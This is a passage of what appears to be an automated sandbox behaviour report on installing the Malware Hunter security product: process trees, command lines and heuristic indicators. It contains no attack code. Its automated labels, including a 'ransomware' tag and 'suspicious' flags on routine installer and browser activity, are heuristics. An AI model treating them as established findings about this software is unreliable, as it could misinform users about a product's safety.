5812	QuickSearch.exe
5920	MemfilesService.exe
5920	MemfilesService.exe
5920	MemfilesService.exe
5920	MemfilesService.exe
5920	MemfilesService.exe
5812	QuickSearch.exe
5812	QuickSearch.exe
5812	QuickSearch.exe
5920	MemfilesService.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
7772	SystemSettingsAdminFlows.exe
7572	SystemSettingsAdminFlows.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe
4664	MalwareHunter.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1532 wrote to memory of 2008	1532	chrome.exe	83
PID 1532 wrote to memory of 2008	1532	chrome.exe	83
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 1484	1532	chrome.exe	85
PID 1532 wrote to memory of 3964	1532	chrome.exe	86
PID 1532 wrote to memory of 3964	1532	chrome.exe	86
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87
PID 1532 wrote to memory of 2812	1532	chrome.exe	87

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.glarysoft.com/malware-hunter/
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa57dfcc40,0x7ffa57dfcc4c,0x7ffa57dfcc58
  2⤵
  PID:2008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1876,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1872 /prefetch:2
  2⤵
  PID:1484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2296 /prefetch:3
  2⤵
  PID:3964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1700,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:8
  2⤵
  PID:2812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:2360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:2888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4872,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4832 /prefetch:8
  2⤵
  PID:3864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4884,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5032 /prefetch:8
  2⤵
  PID:4116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5300,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5312 /prefetch:8
  2⤵
  PID:3384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4528,i,14543404712854698318,8324942616013300852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4452 /prefetch:8
  2⤵
  PID:5048
- C:\Users\Admin\Downloads\mhsetup.exe
  "C:\Users\Admin\Downloads\mhsetup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2720
- - C:\Users\Admin\AppData\Local\Temp\nsiCDFF.tmp\version.exe
    "C:\Users\Admin\AppData\Local\Temp\nsiCDFF.tmp\version.exe" /versionmh
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3804
- - C:\Windows\SysWOW64\sc.exe
    sc stop GUBootService
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4028
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Glarysoft\Malware Hunter\x64\MHContextHandlerx64.dll"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4008
  - - C:\Windows\system32\regsvr32.exe
      /s "C:\Program Files (x86)\Glarysoft\Malware Hunter\x64\MHContextHandlerx64.dll"
      4⤵
      Loads dropped DLL
      Modifies registry class
      PID:4312
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Glarysoft\Malware Hunter\MHContextHandler.dll"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:1564
- - C:\Windows\SysWOW64\net.exe
    net stop GUBootService
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5012
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop GUBootService
      4⤵
      System Location Discovery: System Language Discovery
      PID:4064
- - C:\Program Files (x86)\Glarysoft\Malware Hunter\MalwareHunter.exe
    "C:\Program Files (x86)\Glarysoft\Malware Hunter\MalwareHunter.exe" /install
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3016
  - - C:\Program Files (x86)\Glarysoft\Malware Hunter\Cloudscan\MHCloudSvc.exe
      "C:\Program Files (x86)\Glarysoft\Malware Hunter\Cloudscan\MHCloudSvc.exe" /RegServer
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:2708
- - C:\Program Files (x86)\Glarysoft\Malware Hunter\Initialize_Standalone_Pro.exe
    "C:\Program Files (x86)\Glarysoft\Malware Hunter\Initialize_Standalone_Pro.exe" /installinit productid=15
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3216
- - C:\Users\Admin\AppData\Local\Temp\nsiCDFF.tmp\statisticsinfo.exe
    "C:\Users\Admin\AppData\Local\Temp\nsiCDFF.tmp\statisticsinfo.exe" /install /MH
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3032
- - C:\Windows\SysWOW64\SchTasks.exe
    SchTasks /Delete /TN GMHSkipUAC /F
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3448
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.glarysoft.com/update/release-notes/?p=15&v=1.191.0.819&l=1&src=10000
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xc4,0x128,0x7ffa43cd46f8,0x7ffa43cd4708,0x7ffa43cd4718
      4⤵
      PID:3216
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,2362234680975409908,17769110788345364743,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
      4⤵
      PID:2072
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,2362234680975409908,17769110788345364743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4580
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,2362234680975409908,17769110788345364743,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
      4⤵
      PID:1448
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,2362234680975409908,17769110788345364743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
      4⤵
      PID:5196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,2362234680975409908,17769110788345364743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
      4⤵
      PID:5204
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,2362234680975409908,17769110788345364743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
      4⤵
      PID:5300
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,2362234680975409908,17769110788345364743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5460
- - C:\Program Files (x86)\Glarysoft\Malware Hunter\MalwareHunter.exe
    "C:\Program Files (x86)\Glarysoft\Malware Hunter\MalwareHunter.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Enumerates connected drives
    - Writes to the Master Boot Record (MBR)
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:4664
  - - C:\Program Files (x86)\Glarysoft\Malware Hunter\x64\x64ProcessAssistSvc.exe
      "C:\Program Files (x86)\Glarysoft\Malware Hunter\x64\x64ProcessAssistSvc.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      PID:4100
  - - C:\Program Files (x86)\Glarysoft\Malware Hunter\mhtray.exe
      "C:\Program Files (x86)\Glarysoft\Malware Hunter\mhtray.exe" /start;458798
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:5448
  - - C:\Program Files (x86)\Glarysoft\Malware Hunter\PCBooster.exe
      "C:\Program Files (x86)\Glarysoft\Malware Hunter\PCBooster.exe" open
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:5772
    - - C:\Program Files (x86)\Glarysoft\Malware Hunter\QuickSearch.exe
        
        "C:\Program Files (x86)\Glarysoft\Malware Hunter\QuickSearch.exe" /Mini 66966
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:5812
      - C:\Program Files (x86)\Glarysoft\Malware Hunter\x64\MemfilesService.exe
        
        "C:\Program Files (x86)\Glarysoft\Malware Hunter\x64\MemfilesService.exe"
        6⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of SetWindowsHookEx
        
        PID:5920
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.glarysoft.com/g/t/buy/cn/10000/s/Malware%20Hunter%20Pro/v/1.191.0.819
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of SendNotifyMessage
      PID:5368
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa43cd46f8,0x7ffa43cd4708,0x7ffa43cd4718
        5⤵
        
        PID:5228
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
        5⤵
        
        PID:2224
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4468
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
        5⤵
        
        PID:3028
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
        5⤵
        
        PID:5864
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
        5⤵
        
        PID:5848
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
        5⤵
        
        PID:4724
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
        5⤵
        
        PID:5192
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5732
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
        5⤵
        
        PID:5060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
        5⤵
        
        PID:5108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
        5⤵
        
        PID:3928
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5480 /prefetch:8
        5⤵
        
        PID:3440
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
        5⤵
        
        PID:2764
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
        5⤵
        
        PID:460
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
        5⤵
        
        PID:1388
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
        5⤵
        
        PID:5312
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
        5⤵
        
        PID:5652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
